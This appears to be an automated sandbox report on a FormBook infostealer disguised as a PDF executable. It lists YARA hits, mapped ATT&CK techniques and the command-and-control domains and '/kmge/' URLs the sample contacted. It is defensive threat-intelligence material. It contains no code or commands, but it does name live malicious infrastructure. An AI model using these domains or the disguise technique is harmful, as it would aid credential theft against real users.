Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	712 Process Injection	3 Obfuscated Files or Information	Security Account Manager	224 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	NTDS	331 Security Software Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	211 Masquerading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Modify Registry	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	141 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	712 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
101 2043 5770 pdf.exe	32%	ReversingLabs
101 2043 5770 pdf.exe	16%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\101 2043 5770 pdf.exe	32%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
shearwaterpembrokeshire.com	4%	Virustotal	Browse
www.landfillequip.com	1%	Virustotal	Browse
www.mrawkward.xyz	9%	Virustotal	Browse
www.hhe-crv220.com	8%	Virustotal	Browse
www.shearwaterpembrokeshire.com	3%	Virustotal	Browse
www.sejasuapropriachefe.com	4%	Virustotal	Browse
www.icvp5o.xyz	10%	Virustotal	Browse
www.a2zglobalimports.com	3%	Virustotal	Browse
www.kickssoccercamp.com	6%	Virustotal	Browse
www.sacksmantenimiento.store	9%	Virustotal	Browse
www.cq0jt.sbs	11%	Virustotal	Browse
www.n5l780.com	5%	Virustotal	Browse
www.bedbillionaire.com	10%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881	0%	URL Reputation	safe
https://aka.ms/nativeaot-compatibility	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	0%	URL Reputation	safe
https://api.msn.com/v1/news/Feed/Windows?	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://aka.ms/nativeaot-c	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://crash-reports.mozilla.com/submit?id=	0%	URL Reputation	safe
http://www.sejasuapropriachefe.com	0%	Avira URL Cloud	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg	0%	URL Reputation	safe
www.a2zglobalimports.com/kmge/	100%	Avira URL Cloud	malware
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	0%	Avira URL Cloud	safe
http://www.sacksmantenimiento.storeReferer:	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF	0%	Avira URL Cloud	safe
https://word.office.comM	0%	Avira URL Cloud	safe
http://www.mrawkward.xyz/kmge/	0%	Avira URL Cloud	safe
http://www.hhe-crv220.com/kmge/www.sacksmantenimiento.store	100%	Avira URL Cloud	malware
http://www.sejasuapropriachefe.com	4%	Virustotal		Browse
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	0%	Avira URL Cloud	safe
http://www.n5l780.comReferer:	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri	0%	Avira URL Cloud	safe
http://www.mrawkward.xyz	0%	Avira URL Cloud	safe
http://www.blucretebistro.comReferer:	0%	Avira URL Cloud	safe
http://www.cq0jt.sbs	100%	Avira URL Cloud	malware
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	0%	Virustotal		Browse
http://www.kickssoccercamp.com	100%	Avira URL Cloud	malware
https://wns.windows.com/e	0%	Avira URL Cloud	safe
http://www.mrawkward.xyz	9%	Virustotal		Browse
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	0%	Avira URL Cloud	safe
www.a2zglobalimports.com/kmge/	10%	Virustotal		Browse
http://www.cq0jt.sbs	11%	Virustotal		Browse
http://www.gsolartech.comReferer:	0%	Avira URL Cloud	safe
http://www.kickssoccercamp.com	6%	Virustotal		Browse
http://www.szexvideokingyen.sbs	0%	Avira URL Cloud	safe
http://www.mrawkward.xyz/kmge/	10%	Virustotal		Browse
http://www.shearwaterpembrokeshire.com/kmge/www.sejasuapropriachefe.com	0%	Avira URL Cloud	safe
http://www.hhe-crv220.com/kmge/	100%	Avira URL Cloud	malware
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	0%	Virustotal		Browse
http://www.n5l780.com/kmge/www.szexvideokingyen.sbs	0%	Avira URL Cloud	safe
http://www.n5l780.com/kmge/	0%	Avira URL Cloud	safe
https://aka.ms/nativeaot-compatibilityy	0%	Avira URL Cloud	safe
http://www.sejasuapropriachefe.com/kmge/	0%	Avira URL Cloud	safe
http://www.hhe-crv220.com/kmge/	10%	Virustotal		Browse
http://www.n5l780.com	0%	Avira URL Cloud	safe
http://www.n5l780.com/kmge/www.szexvideokingyen.sbs	6%	Virustotal		Browse
https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc	0%	Avira URL Cloud	safe
http://www.n5l780.com/kmge/	10%	Virustotal		Browse
https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-	0%	Avira URL Cloud	safe
http://www.agritamaperkasaindonesia.com	100%	Avira URL Cloud	malware
http://www.szexvideokingyen.sbs	3%	Virustotal		Browse
https://aka.ms/nativeaot-compatibilityy	0%	Virustotal		Browse
http://www.icvp5o.xyz	100%	Avira URL Cloud	malware
http://www.landfillequip.com	0%	Avira URL Cloud	safe
http://www.sacksmantenimiento.store/kmge/	100%	Avira URL Cloud	malware
http://www.mrawkward.xyzReferer:	0%	Avira URL Cloud	safe
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z	0%	Avira URL Cloud	safe
https://outlook.come	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	0%	Avira URL Cloud	safe
http://www.blucretebistro.com/kmge/	0%	Avira URL Cloud	safe
http://www.sejasuapropriachefe.com/kmge/	7%	Virustotal		Browse
https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-	0%	Avira URL Cloud	safe
http://www.a2zglobalimports.comReferer:	0%	Avira URL Cloud	safe
http://www.cq0jt.sbsReferer:	0%	Avira URL Cloud	safe
http://www.bedbillionaire.com/kmge/www.mrawkward.xyz	100%	Avira URL Cloud	malware
http://www.landfillequip.com/kmge/	0%	Avira URL Cloud	safe
http://www.a2zglobalimports.com/kmge/www.shearwaterpembrokeshire.com	100%	Avira URL Cloud	malware
http://www.bedbillionaire.comReferer:	0%	Avira URL Cloud	safe
http://www.sacksmantenimiento.store/kmge/www.a2zglobalimports.com	100%	Avira URL Cloud	malware
https://api.msn.com/I	0%	Avira URL Cloud	safe
http://www.cq0jt.sbs/kmge/www.hhe-crv220.com	100%	Avira URL Cloud	malware
http://www.landfillequip.comReferer:	0%	Avira URL Cloud	safe
http://www.mrawkward.xyz/kmge/www.landfillequip.com	0%	Avira URL Cloud	safe
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0	0%	Avira URL Cloud	safe
http://www.szexvideokingyen.sbs/kmge/www.agritamaperkasaindonesia.com	0%	Avira URL Cloud	safe
http://www.hhe-crv220.com	100%	Avira URL Cloud	malware
http://www.sacksmantenimiento.store	100%	Avira URL Cloud	malware
http://www.sejasuapropriachefe.comReferer:	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h	0%	Avira URL Cloud	safe
http://www.gsolartech.com/kmge/	100%	Avira URL Cloud	malware
https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu	0%	Avira URL Cloud	safe
http://www.blucretebistro.com	0%	Avira URL Cloud	safe
http://www.kickssoccercamp.com/kmge/	100%	Avira URL Cloud	malware
http://www.bedbillionaire.com/kmge/	100%	Avira URL Cloud	malware
http://www.kickssoccercamp.comReferer:	0%	Avira URL Cloud	safe
http://www.icvp5o.xyz/kmge/	100%	Avira URL Cloud	malware
http://www.bedbillionaire.com	100%	Avira URL Cloud	malware
http://www.shearwaterpembrokeshire.com	0%	Avira URL Cloud	safe
http://www.icvp5o.xyzReferer:	0%	Avira URL Cloud	safe
http://www.blucretebistro.com/kmge/www.gsolartech.com	0%	Avira URL Cloud	safe
http://www.a2zglobalimports.com	100%	Avira URL Cloud	malware
http://www.szexvideokingyen.sbsReferer:	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.landfillequip.com	204.11.56.48	true	true	1%, Virustotal, Browse	unknown
shearwaterpembrokeshire.com	3.33.130.190	true	true	4%, Virustotal, Browse	unknown
www.mrawkward.xyz	unknown	unknown	true	9%, Virustotal, Browse	unknown
www.n5l780.com	unknown	unknown	true	5%, Virustotal, Browse	unknown
www.cq0jt.sbs	unknown	unknown	true	11%, Virustotal, Browse	unknown
www.hhe-crv220.com	unknown	unknown	true	8%, Virustotal, Browse	unknown
www.kickssoccercamp.com	unknown	unknown	true	6%, Virustotal, Browse	unknown
www.a2zglobalimports.com	unknown	unknown	true	3%, Virustotal, Browse	unknown
www.shearwaterpembrokeshire.com	unknown	unknown	true	3%, Virustotal, Browse	unknown
www.sejasuapropriachefe.com	unknown	unknown	true	4%, Virustotal, Browse	unknown
www.icvp5o.xyz	unknown	unknown	true	10%, Virustotal, Browse	unknown
www.bedbillionaire.com	unknown	unknown	true	10%, Virustotal, Browse	unknown
www.sacksmantenimiento.store	unknown	unknown	true	9%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.a2zglobalimports.com/kmge/	true	10%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.landfillequip.com/kmge/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.sacksmantenimiento.storeReferer:	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.sejasuapropriachefe.com	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF	explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881	ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://word.office.comM	explorer.exe, 00000007.00000003.2981180809.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982713681.000000000C080000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2149784147.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602035655.000000000C087000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mrawkward.xyz/kmge/	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.hhe-crv220.com/kmge/www.sacksmantenimiento.store	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.n5l780.comReferer:	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri	explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mrawkward.xyz	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.blucretebistro.comReferer:	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/nativeaot-compatibility	101 2043 5770 pdf.exe, 00000019.00000002.2357342046.00007FF6802A2000.00000004.00000001.01000000.00000006.sdmp	false	URL Reputation: safe	unknown
http://www.cq0jt.sbs	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.kickssoccercamp.com	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	6%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://wns.windows.com/e	explorer.exe, 00000007.00000002.4598436939.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075926924.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132972491.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2979257208.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.gsolartech.comReferer:	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.szexvideokingyen.sbs	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.shearwaterpembrokeshire.com/kmge/www.sejasuapropriachefe.com	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hhe-crv220.com/kmge/	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	10%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.n5l780.com/kmge/www.szexvideokingyen.sbs	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	6%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://mozilla.org0/	ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.n5l780.com/kmge/	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://aka.ms/nativeaot-compatibilityy	101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.sejasuapropriachefe.com/kmge/	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	false	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.n5l780.com	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc	explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-	explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.agritamaperkasaindonesia.com	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.icvp5o.xyz	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.landfillequip.com	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
